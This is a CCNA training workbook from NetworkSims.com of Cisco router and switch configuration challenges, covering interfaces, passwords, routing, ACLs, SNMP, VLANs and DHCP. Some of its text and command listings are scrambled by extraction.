Network Emulators

NetworkSims
.com
Web:
Contact:
http://networksims.com
support@networksims.com
NetworkSims.com
CCNA
Cisco Router Challenge 1

Outline
This challenge involves the configuration of the E0 port on a router.
Objectives
The objectives of this challenge are to:
Setup the IP address on E0 port.

Setup the subnet mask on E0 port.
Enable the E0 port.
Set the description for the E0 port.
Define the speed of the E0 port.
Define duplex on the E0 port.
Define a host table.
Example
> enable
# config t
(config)# hostname mars
mars (config)# ip domain-n ?
WORD Default domain name
mars (config)# ip domain-name fred.co
mars (config)# int e0
mars (config-if)# ?
Interface configuration commands:
access-expression
Build a bridge boolean access expression
arp
Set arp type (arpa, probe, snap) or timeout
backup
Modify backup parameters
bandwidth
Set bandwidth informational parameter
bgp-policy
Apply policy propogated by bgp community string
bridge-group
Transparent bridging interface parameters
carrier-delay
Specify delay for interface transitions
cdp
CDP interface subcommands
clns
CLNS interface subcommands
cmns
OSI CMNS
crypto
Encryption/Decryption commands
custom-queue-list
Assign a custom queue list to an interface
dampening
Enable event dampening
default
Set a command to its defaults
delay
Specify interface throughput delay
description
Interface specific description
NetworkSims.com
diffserv
dot1q
dot1x
duplex
exit
fair-queue
flow-sampler
full-duplex
glbp
half-duplex
help
hold-queue
ip
isis
iso-igrp
keepalive
llc2
load-interval
diffserv (Provisioning)
dot1q interface configuration commands
Interface Config Commands for 802.1x
Configure duplex operation.
Exit from interface configuration mode
Enable Fair Queuing on an Interface
Attach flow sampler to the interface
Configure full-duplex operational mode
Gateway Load Balancing Protocol interface commands
Configure half-duplex and related commands
Description of the interactive help system
Set hold queue depth
Interface Internet Protocol config commands
IS-IS commands
ISO-IGRP interface subcommands
Enable keepalive
LLC2 Interface Subcommands
Specify interval for load calculation for an
interface
logging
Configure logging for interface
loopback
Configure internal loopback on an interface
mac-address
Manually set interface MAC address
max-reserved-bandwidth Maximum Reservable Bandwidth on an Interface
mls
mls interface commands
mop
DEC MOP server commands
mtu
Set the interface Maximum Transmission Unit (MTU)
netbios
Use a defined NETBIOS access list or enable
name-caching
no
Negate a command or set its defaults
ntp
Configure NTP
pagp
PAgP interface subcommands
pppoe
pppoe interface subcommands
pppoe-client
pppoe client
priority-group
Assign a priority group to an interface
random-detect
Enable Weighted Random Early Detection (WRED) on an
Interface
rate-limit
Rate Limit
roles
Specify roles (by entering roles mode)
service-policy
Configure QoS Service Policy
shutdown
Shutdown the selected interface
snapshot
Configure snapshot support on the interface
snmp
Modify SNMP interface parameters
speed
Configure speed operation.
standby
HSRP interface configuration commands
tarp
TARP interface subcommands
timeout
Define timeout values for this interface
traffic-shape
Enable Traffic Shaping on an Interface or
Sub-Interface
transmit-interface
Assign a transmit interface to a receive-only
interface
trunk-group
Configure interface to be in a trunk group
tx-ring-limit
Configure PA level transmit ring limit
vlan-id
Process VLAN-encapsulated packets with a specific
VLAN ID
vlan-range
Process VLAN-encapsulated packets with a range of
VLAN IDs
vrrp
VRRP Interface configuration commands
mars (config-if)# ip address 36.109.222.1 255.255.255.128
mars (config-if)# no shutdown
mars (config-if)# description testing123
mars (config-if)# speed ?
10
Force 10 Mbps operation
100
NetworkSims.com
auto Enable AUTO speed configuration

mars (config-if)# speed 10
mars (config-if)# duplex ?
auto Enable AUTO duplex configuration
full Force full duplex operation
half Force half-duplex operation
mars (config-if)# duplex half
mars (config-if)# exit
mars (config)# ip host ?
WORD Name of host
mars (config)# ip host oregon ?
<0-65535>
Default telnet port number
A.B.C.D
Host IP address
additional Append addresses
mars (config)# ip host oregon 200.150.174.6
mars (config)# ip host idaho 192.49.172.8
mars (config)# ip host montana 99.33.235.9
(config)# exit
# sh running

Outline
This challenge involves the setting up the serial port parameters.
Objectives
Setup the IP address on S0 port.

Setup the subnet mask on S0 port.
Enable the S0 port.
Set the description for the S0 port.
Enable the S1 port.
Example
> enable
# config t
(config)# int s0
(config-if)# ?
access-expression
appletalk
Appletalk interface subcommands
arp
autodetect
Autodetect Encapsulations on Serial interface
backup
bandwidth
NetworkSims.com
bridge-group
carrier-delay
cdp
clock
compress
custom-queue-list
dce-terminal-timing-enable
decnet
default
delay
description
dialer
dialer-group
down-when-looped
dxi
encapsulation
exit
fair-queue
full-duplex
half-duplex
help
hold-queue
idle-character
ignore
ignore-dcd
ignore-hw
invert
ip
ipx
keepalive
line-power
llc2
load-interval
logging
loopback
mac-address
max-reserved-bandwidth
mop
mtu
multilink-group
netbios
network-clock-priority
no
nrzi-encoding
ntp
physical-layer
ppp
priority-group
pulse-time
random-detect
rate-limit
serial
service-policy
shutdown
smds
smrp
snapshot
snmp
NetworkSims.com

Configure serial interface clock
Set serial interface for compression
Enable DCE terminal timing
Interface DECnet config commands
Dial-on-demand routing (DDR) commands
Assign interface to dialer-list
Force looped serial interface down
ATM-DXI configuration commands
Set encapsulation type for an interface
Set idle character type
ignore signals
ignore dcd
ignore a serial signal
Serial invert modes
Novell/IPX interface subcommands
Enable keepalive
Provide power on the line.
interface
Maximum Reservable Bandwidth on an Interface
DEC MOP server commands
Put interface in a multilink bundle
name-caching
Configure clock source priority
Enable use of NRZI encoding
Configure NTP
Configure sync or async physical layer on serial
interface
Point-to-Point Protocol
Force DTR low during resets
Enable Weighted Random Early Detection (WRED) on
an Interface
Rate Limit
serial interface commands
Modify SMDS parameters
Simple Multicast Routing Protocol interface
subcommands
source
timeout
traffic-shape
Get config from another source

Sub-Interface
transmit-interface
interface
transmitter-delay
Set dead-time after transmitting a datagram
trunk-group
tx-ring-limit
(config-if)# ip address 160.52.39.9 255.248.0.0
(config-if)# no shutdown
(config-if)# description management
(config-if)# carrier-delay ?
<0-60> Carrier Transitions delay seconds
msec
delay specified in milliseconds
(config-if)# carrier-delay 5
(config-if)# int s1
(config-if)# description production depart
(config-if)# end
# sh running

Outline
This challenge involves the configuration of the name server, user names and passwords.
Objectives
Setup the name server.

Setup the privileged and executive password.
Setup a username and password.
Example
> enable
# config t
(config)# ip name-server 51.16.207.1
(config)# ena ?
last-resort Define enable action if no TACACS servers respond
password
Assign the privileged level password
secret
Assign the privileged level secret
use-tacacs
Use TACACS to check enable passwords
(config)# enable password default1
(config)# enable secret ankle
Router(config)# user bunty ?
access-class
Restrict access by access-class
autocommand
Automatically issue a command after the user logs in
callback-dialstring Callback dialstring
NetworkSims.com
callback-line
Associate a specific line with this callback
callback-rotary
Associate a rotary group with this callback
dnis
Do not require password when obtained via DNIS
nocallback-verify
Do not require authentication after callback
noescape
Prevent the user from using an escape character
nohangup
Do not disconnect after an automatic command
nopassword
No password is required for the user to log in
password
Specify the password for the user
privilege
Set user privilege level
secret
Specify the secret for the user
user-maxlinks
Limit the user's number of inbound links
view
Set view name
<cr>
(config)# username bunty password apple
(config)# exit
# sh running

Outline
This challenge involves the configuration of the interface ports.
Objectives
Setup the domain name.

Define the hostname.
Enable the interface ports.
Example
> enable
# config t
(config)# ip domain-name work.org
(config)# hostname wyoming
wyoming (config)# int e0
wyoming (config-if)# no shutdown
wyoming (config-if)# int s0
wyoming (config-if)# int s1
(config)# exit
# sh running

Outline
NetworkSims.com
This challenge involves the configuration banners and the HTTP server.
Objectives

Define the banners.
Enable the HTTP server.
Example
> enable
# config t
(config)# hostname Amsterdam
amsterdam (config)# banner ?
LINE
c banner-text c, where 'c' is a delimiting character
exec
Set EXEC process creation banner
incoming
Set incoming terminal line banner
login
Set login banner
motd
Set Message of the Day banner
prompt-timeout Set Message for login authentication timeout
slip-ppp
Set Message for SLIP/PPP
amsterdam (config)# bann mo ?
LINE c banner-text c, where 'c' is a delimiting character
amsterdam (config)# banner motd my device
amsterdam (config)# banner login how are you
amsterdam (config)# banner exec main device
amsterdam (config)# ip http server
amsterdam (config)# ip http ?
access-class
Restrict http server access by access-class
authentication
Set http server authentication method
client
Set http client parameters
max-connections
Set maximum number of concurrent http server connections
path
Set base path for HTML
port
Set http server port
secure-ciphersuite Set http secure server ciphersuite
secure-client-auth Set http secure server with client authentication
secure-port
Set http secure server port number for listening
secure-server
Enable HTTP secure server
secure-trustpoint
Set http secure server certificate trustpoint
server
Enable http server
timeout-policy
Set http server time-out policy parameters
(config)# exit
# sh running

Outline
This challenge involves the configuration of RIP.
NetworkSims.com
Objectives
Define RIP routing.

Define the networks associated.
Define CDP
Define IP subnet zero.
Define IP classless.
Example
> enable
# config t
(config)# router ?
bgp
Border Gateway Protocol (BGP)
eigrp
Enhanced Interior Gateway Routing Protocol (EIGRP)
isis
ISO IS-IS
iso-igrp IGRP for OSI networks
mobile
Mobile routes
odr
On Demand stub Routes
ospf
Open Shortest Path First (OSPF)
rip
Routing Information Protocol (RIP)
(config)# router rip
(config-router)# ?
Router configuration commands:
address-family
Enter Address Family command mode
auto-summary
Enable automatic network number summarization
default
default-information
Control distribution of default information
default-metric
Set metric of redistributed routes
distance
Define an administrative distance
distribute-list
Filter networks in routing updates
exit
Exit from routing protocol configuration mode
flash-update-threshold Specify flash update threshold in second
help
input-queue
Specify input queue depth
maximum-paths
Forward packets over multiple paths
neighbor
Specify a neighbor router
network
Enable routing on an IP network
no
offset-list
Add or subtract offset from RIP metrics
output-delay
Interpacket delay for RIP updates
passive-interface
Suppress routing updates on an interface
redistribute
Redistribute information from another routing
protocol
timers
Adjust routing timers
traffic-share
How to compute traffic share over alternate paths
validate-update-source Perform sanity checks against source address of
routing updates
version
Set routing protocol version
(config-router)# version 2
(config-router)# network 166.248.0.0
(config-network)# exit
(config)# cdp ?
advertise-v2
CDP sends version-2 advertisements
NetworkSims.com
holdtime
Specify the holdtime (in sec) to be sent in packets
log
Log messages generated by CDP
source-interface Insert the interface's IP in all CDP packets
timer
Specify the rate at which CDP packets are sent
(in sec)
run
(config)# cdp run
(config)# int e0
(config)# int fa0/0
(config-if)# cdp ?
enable Enable CDP on interface
log
(config-if)# cdp enable
(config-if)# exit
(config)# ip subnet-zero
(config)# ip classless
(config)# exit
# sh running

Outline
This challenge involves the setting of logging, the clock and HTTP settings.
Objectives
Setup logging.
Define the clock.
Define HTTP settings.
Example
> enable
# config t
(config)# logging ?
Hostname or A.B.C.D
buffered
cns-events
console
count
exception
facility
history
host
monitor
on
origin-id
rate-limit
reload
NetworkSims.com
IP address of the logging host

Set buffered logging parameters
Set CNS Event logging level
Set console logging parameters
Count every log message and timestamp last occurance
Limit size of exception flush output
Facility parameter for syslog messages
Configure syslog history table
Set syslog server IP address and parameters
Set terminal line (monitor) logging parameters
Enable logging to all supported destinations
Add origin ID to syslog messages
Set messages per second limit
Set reload logging level
10
server-arp
source-interface
Enable sending ARP requests for syslog servers when

first configured
Specify interface for source address in logging
transactions
Set syslog server logging level
trap
(config)# logging on
(config)# logging 212.72.52.7
(config)# logging buffer 440240
(config)# logging host 138.24.170.8
(config)# logging trap emergency
(config)# logging monitor emergency
(config)# logging console emergency
(config)# logging buffer emergency
(config)# clock timezone AKDT
(config)# ip http ?
access-class
authentication
client
max-connections
path
port
secure-port
secure-server
secure-trustpoint
server
Enable http server
timeout-policy
(config)# ip http server
(config)# ip http max-connections 7
(config)# ip http port 1024
(config)# exit
# sh running

Outline
This challenge involves the configuration of CDP and the default gateway.
Objectives
Define CDP.
Example
> enable
# config t
(config)# ip default-gateway 139.35.119.5
(config)# cdp ?
advertise-v2 CDP sends version-2 advertisements
holdtime
timer
run
(in sec)
(config)# cdp run
NetworkSims.com
11
(config)# cdp holdtime ?

<10-255> Length of time (in sec) that receiver must keep this packet
(config)# cdp timer ?
<5-254> Rate at which CDP packets are sent (in sec)
(config)# cdp holdtime 4

(config)# cdp timer 89
(config)# int e0
(config-if)# end
(config)# line vty 0 15
(config-line)# login
(config)# end
# sh running

Outline
This challenge involves the configuration of SNMP.
Objectives
Define the main parameters for the SNMP server.
Example
> enable
# config t
(config)# snmp-s ?
chassis-id
String to uniquely identify this chassis
community
Enable SNMP; set community string and access privs
contact
Text for mib object sysContact
context
Create/Delete a context apart from default
drop
Silently drop SNMP packets
enable
Enable SNMP Traps or Informs
engineID
Configure a local or remote SNMPv3 engineID
group
Define a User Security Model group
host
Specify hosts to receive SNMP notifications
ifindex
Enable ifindex persistence
location
Text for mib object sysLocation
packetsize
Largest SNMP packet size
queue-length
Message queue length for each TRAP host
system-shutdown
Enable use of the SNMP reload command
tftp-server-list Limit TFTP servers used via SNMP
trap
SNMP trap options
trap-source
Assign an interface for the source address of all traps
trap-timeout
Set timeout for TRAP message retransmissions
user
Define a user who can access the SNMP engine
view
Define an SNMPv2 MIB view
(config)# smmp-server community annt RO
(config)# smmp-server contact steven
(config)# smmp-server location uk
(config)# smmp-server host 78.113.70.11
(config)# smmp-server enable traps
NetworkSims.com
12
(config)# smmp-server chassis-ID paris

(config)# end
# sh running

Outline
Objectives

Enable the E0 port.
Example
> enable
# config t
(config)# int s0
(config-if)# description students
(config-if)# encapsulation ?
atm-dxi
ATM-DXI encapsulation
frame-relay Frame Relay networks
hdlc
Serial HDLC synchronous
lapb
LAPB (X.25 Level 2)
ppp
Point-to-Point protocol
smds
Switched Megabit Data Service (SMDS)
x25
X.25
(config-if)# encapsulation ppp
(config-if)# ppp ?
accm
Set initial Async Control Character Map
acfc
Options for HDLC Address & Control Field Compression
authentication Set PPP link authentication method
bridge
Enable PPP bridge translation
chap
Set CHAP authentication parameters
ipcp
Set IPCP negotiation options
lcp
PPP LCP configuration
link
Set miscellaneous link parameters
max-bad-auth
Allow multiple authentication failures
multilink
Make interface multilink capable
pap
Set PAP authentication parameters
pfc
Options for Protocol Field Compression
NetworkSims.com
13
quality
Set minimum Link Quality before link is down
reliable-link
Use LAPB with PPP to provide a reliable link
timeout
Set PPP timeout parameters
use-tacacs
Use TACACS to verify PPP authentications
(config-if)# ppp authentication?
chap
Challenge Handshake Authentication Protocol (CHAP)
ms-chap Microsoft Challenge Handshake Authentication Protocol (MS-CHAP)
pap
Password Authentication Protocol (PAP)
(config-if)# ppp authentication chap
(config-if)# clock ?
rate Configure serial interface clock speed
(config-if)# clock rate ?
Speed (bits per second)
1200
2400
4800
9600
14400
19200
28800
32000
38400
56000
57600
64000
72000
115200
125000
128000
148000
192000
250000
256000
384000
500000
512000
768000
800000
1000000
1300000
2000000
4000000
8000000
<300-4000000>
Choose clockrate from list above
(config-if)# clock rate 56000
(config-if)# bandwidth 198
(config-if)# no fair-queue
(config)# end
# sh running

Outline
This challenge involves the configuration of the S1 port on a router.
NetworkSims.com
14
Objectives

Setup encapsulation on the S01port.
Setup authentication on the S1 port.
Define other S1 parameters.
Example
> enable
# config t
(config)# int s1
(config-if)# description academics
(config-if)# ppp authentication pap
(config-if)# no fair-queue
(config-if)# end
# sh running

Outline
This challenge involves the configuration of the default-gateway and the hosts table.
Objectives
Setup the default gateway.

Setup the hostname.
Define a hosts table.
Example
> en
# config t
(config)# hostname montana
montana (config)# ip host tennessee 211.99.108.9
NetworkSims.com
15
montana (config)# ip host kirkcaldy 154.242.2.8

montana (config)# ip host edinburgh 64.2.249.2
(config)# exit
# sh running

Outline
This challenge involves the configuration of CON and VTY settings.
Objectives
Setup settings for CON.

Setup setting for VTY.
Example
> en
# config t
(config)# line con ?
<0-0> First Line number
(config)# line con 0
(config-line)# pas ?
0
Specifies an UNENCRYPTED password will follow
7
Specifies a HIDDEN password will follow
LINE The UNENCRYPTED (cleartext) line password
(config-line)# password lothian
(config-line)# timeout ?
login Timeouts related to the login sequence
(config-line)# timeout login ?
response Timeout for any user input during login sequences
(config-line)# timeout login response ?
<0-300> Timeout in seconds
(config-line)# timeout login response 19
(config-line)# exec-timeout ?
<0-35791> Timeout in minutes
(config-line)# exec-timeout 11
(config-line)# log
synchronous Synchronized message output
(config-line)# log synchronous
(config-line)# line vty 0 8
(config-line)# password mississippi
(config-line)# exit
(config)# exit
# sh running
NetworkSims.com
16

Outline
This challenge involves the configuration of the boot and clock settings.
Objectives
Setup the local clock.

Define different boot settings.
Example
# clock ?
set Set the time and date
# clock set 06:25
# config t
(config)# boot system ?
WORD
TFTP filename or URL
flash Boot from flash memory
mop
Boot from a Decnet MOP server
rcp
Boot from a server via rcp
tftp
Boot from a tftp server
(config)# boot system tftp c28.bin
(config)# ip dhcp ?
conflict
DHCP address conflict parameters
database
Configure DHCP database agents
excluded-address
Prevent DHCP from assigning certain addresses
limited-broadcast-address Use all 1's broadcast address
ping
Specify ping parameters used by DHCP
pool
Configure DHCP address pools
relay
DHCP relay agent parameters
smart-relay
Enable Smart Relay feature
(config)# ip dhcp pool ?
WORD Pool name
(config)# ip dhcp pool paris
(config-dhcp)# exit
(config)# aaa ?
new-model Enable NEW access control commands and functions.(Disables OLD
commands.)
(config)# aaa new-model

Outline
NetworkSims.com
17
This challenge involves the configuration of a standard ACL.

Objectives
Setup a standard ACL.

Setup an ACL to permit and deny a single host.
Setup an ACL to permit and deny a single network.
Setup an ACL to permit everything else.
Apply it on the incoming port of E0.
Example
> en
# config t
(config)# access-list
2
2
2
2
2
permit host 130.152.162.10

deny host 193.68.36.8
permit 207.182.133.0 0.1.255.255
deny 153.246.194.0 0.0.127.255
permit any
(config)# int e0
(config-if)# ip access-group
(config-if)# ip access-group 2 in

Outline
Objectives

Setup an ACL to deny everything else.
Apply it on the incoming port of S0.
Example
> en
# config t
(config)# access-list 2 permit host 130.152.162.10
NetworkSims.com
18
(config)#
(config)#
(config)#
(config)#
access-list
access-list
access-list
access-list
2
2
2
2
deny host 193.68.36.8

permit 207.182.133.0 0.1.255.255
deny 153.246.194.0 0.0.127.255
deny any
(config)# int s0

Outline
This challenge involves the configuration of an extended ACL.
Objectives
Define an extended ACL.

Define a host to be allowed.
Define a host to be denied.
Define a network to be allowed.
Define a network to be denied.
Permit everything else.
Apply ACL onto E0.
Example
> en
# config t
(config)# access-list 105 ?
deny
Specify packets to reject
dynamic Specify a DYNAMIC list of PERMITs or DENYs
permit
Specify packets to forward
remark
Access list entry comment
(config)# access-list 105 permit ?
<0-255> An IP protocol number
ahp
Authentication Header Protocol
eigrp
Cisco's EIGRP routing protocol
esp
Encapsulation Security Payload
gre
Cisco's GRE tunneling
icmp
Internet Control Message Protocol
igmp
Internet Gateway Message Protocol
igrp
Cisco's IGRP routing protocol
ip
Any Internet Protocol
ipinip
IP in IP tunneling
nos
KA9Q NOS compatible IP over IP tunneling
ospf
OSPF routing protocol
pcp
Payload Compression Protocol
pim
Protocol Independent Multicast
NetworkSims.com
19
tcp
Transmission Control Protocol
udp
User Datagram Protocol
(config)# access-list 105 permit tcp host 208.89.101.4 host 41.153.91.2 eq ftp
(config)# access-list 105 deny tcp host 197.119.92.8 host 144.98.220.6 eq ftp
255.255.255.0 eq ftp
255.255.255.0 eq ftp
105
105
permit
deny
tcp
tcp
100.120.83.0
35.208.170.0
255.255.255.0
71.252.23.0
255.255.255.0
184.124.8.0

deny
permit
remark
(config)# access-list 105 permit tcp
A.B.C.D Source address
any
Any source host
host
A single source host
(config)# access-list 105 permit tcp any ?
A.B.C.D Destination address
any
Any destination host
eq
Match only packets on a given port number
gt
Match only packets with a greater port number
host
A single destination host
lt
Match only packets with a lower port number
neq
Match only packets not on a given port number
range
Match only packets in the range of port numbers
(config)# access-list 105 permit tcp any any
(config)# int e0

Outline
This challenge involves the configuration of named ACLs.
Objectives
Define a named standard ACL.

Define a named extended ACL.
Example
> en
# config t
(config)# ip access-list ?
extended
Extended Access List
log-update Control access list log updates
NetworkSims.com
20
logging
Control access list logging
standard
Standard Access List
(config)# ip access-list standard
<1-99> Standard IP access-list number
WORD
Access-list name
(config)# ip access-list standard leeds
(config-std-nacl)# deny ?
Hostname or A.B.C.D Address to match
any
Any source host
host
A single host address
(config-std-nacl)# deny host 193.34.245.4
(config-std-nacl)# permit host 16.21.50.10
(config-std-nacl)# deny 18.223.156.0 0.15.255.255
(config-std-nacl)# permit 139.32.80.0 0.15.255.255
(config-std-nacl)# exit
(config)# int s0
<1-199>
IP access list (standard or extended)
<1300-2699> IP expanded access list (standard or extended)
WORD
Access-list name
(config-if)# ip access-group leeds in
(config-if)# exit
(config)# ip access-list extended tennessee
(config-ext-nacl)# deny ?
ahp
eigrp
esp
gre
icmp
igmp
igrp
ip
ipinip
IP in IP tunneling
nos
ospf
pcp
pim
tcp
udp
(config-ext-nacl)# deny tcp host 198.89.74.1 host 208.177.41.6 eq telnet
(config-ext-nacl)# permit tcp host 205.198.245.6 host 202.226.135.3 eq telnet
(config-ext-nacl)# deny tcp 54.83.187.0 255.255.255.0 101.167.107.0 255.255.255.0
eq telnet
(config-ext-nacl)# permit tcp 56.248.48.0 255.255.255.0 138.236.218.0 255.255.255.0
eq telnet
(config-ext-nacl)# exit
(config)# int s1
(config-if)# ip access-group tennessee in

Outline
This challenge involves getting rid of users.
Objectives
NetworkSims.com
21
Remove users from the configuration.
Example
> en
# config t
# sh run
Building configuration...
Current configuration : 1380 bytes
!
version 12.0
service udp-small-servers
service tcp-small-servers
no ip subnet-zero
!
!
username fred password bert
username albert password ink
username martin password orange
!
no ip classless
no ip subnet-zero
!
interface ethernet 0
shutdown
!
shutdown
!
interface serial 0
--More------ press any key --shutdown
!
interface serial 1
shutdown
!
interface bri 0
shutdown
!
!
ip host sun 192.168.1.1
ip host mars 10.0.0.1
ip host jupiter 172.10.1.1
cdp holdtime 120
cdp timer 60
!
end
(config)# no username fred password bert
(config)# no username albert password ant
(config)# no username martin password animal
(config)# no ip host sun
(config)# no ip host jupiter
(config)# no ip host mars
NetworkSims.com
22

Outline
This challenge involves getting rid of network configurations.
Objectives
Remove networks from RIP.
Example
> en
# sh run
!
version 12.0
no ip subnet-zero
!
no ip classless
no ip subnet-zero
!
shutdown
!
shutdown
!
interface serial 0
shutdown
!
interface serial 1
!
interface bri 0
shutdown
!
!
router rip
network 192.168.1.0
network 10.0.0.0
network 172.10.10.0
!
cdp holdtime 120
cdp timer 60
!
!
end
# config t
NetworkSims.com
23
(config)# router
(config-router)#
(config-router)#
(config-router)#
rip
no network 192.168.1.0
no network 10.0.0.0
no network 172.10.10.0

Outline
This challenge involves getting rid of the SNMP configurations
Objectives
Get rid of the SNMP-server configurations.
Example
> en
# sh run
!
version 12.0
no ip subnet-zero
!
!
snmp-server community annt ro
snmp-server contact steven
snmp-server location uk
snmp-server host 78.113.70.11
snmp-server enable traps
snmp-server chassis-ID paris
!
!
!
no ip classless
no ip subnet-zero
!
!
shutdown
!
!
interface serial 0
shutdown
!
interface serial 1
shutdown
NetworkSims.com
24
!
interface bri 0
shutdown
!
!
!
!
!
!
!
cdp holdtime 120
cdp timer 60
!
!
end
# config t
(config)# no snmp-server
community annt RO
contact steven
location uk
host 78.113.70.11
enable traps
chassis-ID paris

Outline
This is a test. Good luck!
Cisco Switch Challenge 1

Outline
This challenge involves the configuration an IP address on a VLAN
Objectives
Setup the VLAN address.

Define a domain-name.
Define the default gateway.
Example
NetworkSims.com
25
> en
# config t
(config)# int vlan 1
(config-if)# exit
(config)# ip domain-name perthshire.cc

Outline
This challenge involves the configuration of the console password and to enable the HTTP
server.
Objectives
Setup the console password.

Define the HTTP port.
Define the name server.
Example
> en
# config t
(config-line)# password texas
(config-line)# exit
(config)# cdp run

Outline
This challenge involves the configuration of the VTY server and SNMP settings
Objectives
NetworkSims.com
26
Setup a password on the Telnet session.

Define a username and password.
Define SNMP parameters.
Example
# config t
(config-line)# password manchester
(config-line)# exit
(config)# username june password default1
(config)# snmp-server ?
chassis-id
community
contact
enable
engineID
group
host
ifindex
inform
Configure SNMP Informs options
location
manager
Modify SNMP manager parameters
packetsize
queue-length
system-shutdown
trap
SNMP trap options
trap-source
trap-timeout
user
view
(config)# snmp-server community popup
(config)# snmp-server contact june
(config)# snmp-server location glasgow
chassis-id
community
contact
enable
engineID
group
host
ifindex
inform
location
manager
packetsize
queue-length
system-shutdown
trap
SNMP trap options
trap-source
trap-timeout
user
view
(config)# snmp-server enable ?
informs Enable SNMP Informs
NetworkSims.com
27
traps
Enable SNMP Traps
(config)# snmp-server enable traps
(config)# snmp-server chassis-id brighton

Outline
This challenge involves the configuration of a hosts table
Objectives

Enable an IP hosts table.
Example
# config t
Enter configuration commands, one per line.
End with CNTL/Z.
(config)# ip host ?
WORD Name of host
(config)# ip host brechin
<0-65535>
A.B.C.D
Host IP address
(config)# ip host brechin 209.250.181.10
(config)# ip host mississippi 208.194.196.5
(config)# ip host westvirginia 205.27.128.4
(config)# exit
# show hosts

Outline
This challenge involves the configuration of ethernet port settings and CDP.
Objectives
NetworkSims.com
28
Setup a description on FA0/1.

Setup a speed on FA0/1.
Setup duplex on FA0/1.
Define CDP details.
Example
# config t
(config)# int fa0/1
(config-if)# description aironet 1200
(config-if)# speed 100
(config-if)# duplex full
End with CNTL/Z.
(config-if)# int fa0/2

(config-if)# exit
(config)# cdp run
(config)# int fa0/1
(config-if)# exit
(config)# cdp ?
holdtime
timer
Specify the rate at which CDP packets are sent (in sec)
run
(config)# cd holdtime ?

Outline
This challenge involves the configuration of VLANs
Objectives
Setup VLAN 1, and define an IP address.

The commands used are:
NetworkSims.com
29
> en
# config t
(config-if)# shutdown
(config)# vlan 1
(config-vlan)# name test
(config-vlan)# exit
(config-if)# exit
(config)# vlan 2
(config-vlan)# name test2
(config-vlan)# exit
Or .. using the legacy method:

> en
# vlan database
(vlan)# vlan 1 name newjersey
(vlan)# exit
# config t
(config-if)# exit
(config-if)# exit
Example
> en
# config t
(config)# vlan 1
Switch(config-vlan)# ?
VLAN configuration commands:
are
Maximum number of All Route Explorer hops for
zero if none specified)
backupcrf
Backup CRF mode of the VLAN
bridge
Bridging characteristics of the VLAN
exit
Apply changes, bump revision number, and exit
media
Media type of the VLAN
mtu
VLAN Maximum Transmission Unit
name
Ascii name of the VLAN
no
parent
ID number of the Parent VLAN of FDDI or Token
private-vlan Configure a private VLAN
remote-span
Configure as Remote SPAN VLAN
ring
Ring number of FDDI or Token Ring type VLANs
said
IEEE 802.10 SAID
shutdown
Shutdown VLAN switching
state
Operational state of the VLAN
ste
Maximum number of Spanning Tree Explorer hops
NetworkSims.com
this VLAN (or
mode
Ring type VLANs
for this VLAN (or
30
stp
tb-vlan1
Spanning tree characteristics of the VLAN

ID number of the first translational VLAN for this VLAN (or
zero if none)
tb-vlan2
ID number of the second translational VLAN for this VLAN (or
zero if none)
(config-vlan)# name ?
WORD The ascii name for the VLAN
(config-vlan)# exit
(config-if)# exit
(config)# vlan 2
(config-vlan)# name test2
(config-vlan)# exit
Or .. using the legacy method:

> en
# vlan database
VLAN 1 added:
Name: newjersey
(vlan)# vlan 2 name brighton
VLAN 2 added:
Name: brighton
(vlan)# exit
APPLY completed.
Exiting....
# config t
(config-if)# exit
(config-if)# exit

Outline
This challenge involves the configuration of switchport access parameters.
Objectives
Setup VLAN 2.
NetworkSims.com
31
Define switchport access for VLAN 2.
Example
> en
# vlan database
(vlan)# vlan 2 name amsterdam
VLAN 2 added:
Name: amsterdam
(vlan)# exit
APPLY completed.
Exiting....
# config t
(config-if)# exit
(config)# int fa0/2
(config-if)# switchport access ?
vlan Set VLAN when interface is in access mode
(config-if)# switchport access vlan 2

Outline
This challenge involves the configuration of timeouts for the console.
Objectives
Setup a password on the console.

Define timeouts for the console.
Example
> en
# config t
NetworkSims.com
32

(config-line)# log ?
Cisco Router Test

Outline
This is a router test. Good luck!
Router Challenge 32
Outline
This challenge involves the configuration of Simple Network Time Protocol (SNTP).
Objectives
Setup SNTP to receive time updates from a specific server.

Setup device to receive SNTP broadcasts.
Set the system clock (this would not be required if an SNTP server is used,
obviously).
Example
> enable
# config t
(config)# hostname amsterdam
amsterdam (config)# sntp server 192.168.1.100
amsterdam (config)# sntp broadcast client
amsterdam (config)# exit
amsterdam # clock set 05:44
amsterdam # show sntp
SNTP server
Stratum
Version
Last Receive
NetworkSims.com
33
192.168.1.100
16
never
Broadcast client mode is enabled.
Router Challenge 125 (Filtering)

Outline: This challenge involves filtering the output of the show command.
Objectives: The objectives of this challenge are to outline the usage of the filtering of the
output in the show command.
Explanation
The filtering output includes:
show command | include word this finds all lines with word
show command | begin word
this finds all lines which begin with word
show command | exclude word this finds all lines without word
An example is:
#
#
#
#
#
show
show
show
show
show
running
running
running
running
running
|
|
|
|
|
include udp
include tcp
include !
begin version
exclude int
Router Challenge 126 (Filtering)

Explanation
NetworkSims.com
34
An example is:
#
#
#
#
#
show
show
show
show
show
version
version
version
version
version
|
|
|
|
|
include cisco
include product
include ver
begin power
exclude pca
Switch Challenge 39 (Filtering)

Explanation
An example is:
#
#
#
#
#
show
show
show
show
show
running
running
running
running
running
|
|
|
|
|
include udp
include tcp
include !
begin version
exclude int
Switch Challenge 40 (Filtering)

Explanation
NetworkSims.com
35
An example is:
#
#
#
#
#
show
show
show
show
show
version
version
version
version
version
|
|
|
|
|
NetworkSims.com
include cisco
include product
include ver
begin power
exclude pca
36
Advanced Routing

Outline
This challenge involves the configuration of a DHCP server on the router.
Objectives
Setup a DHCP server.

Setup a DHCP Pool.
Define DHCP networks and subnets.
Define DHCP parameters, such as DNS, NetBios, Timeout and domain.
Example
> en
# config t
(config)# ip dhcpd pool wyoming
(config-dhcp)# network 249.189.108.0 255.255.255.254
(config-dhcp)# dns-server 249.189.108.58
(config-dhcp)# netbios-name-server 249.189.108.61
(config-dhcp)# lease 3
(config-dhcp)# default-router 249.189.108.87
(config-dhcp)# exit
(config)# ip dhcp ?
conflict
database
excluded-address
ping
pool
relay
smart-relay
(config)#ip dhcp excluded-address 249.189.108.26
(config)# ip dhcp ping ?
packets Specify number of ping packets
timeout Specify ping timeout
(config)# ip dhcp ping timeout 350
NetworkSims.com
37

Outline
This challenge involves the configuration of IP helper addresses.
Objectives
Setup E0 parameters.
Setup IP helper addresses.
Example
> en
# config t
(config)# int e0
(config-if)# ip helper-address 132.61.138.4
(config-if)# int s0
(config-if)# int s1

Outline
Objectives

NetworkSims.com
38
Enable the E0 port.

Example
> en
# config t
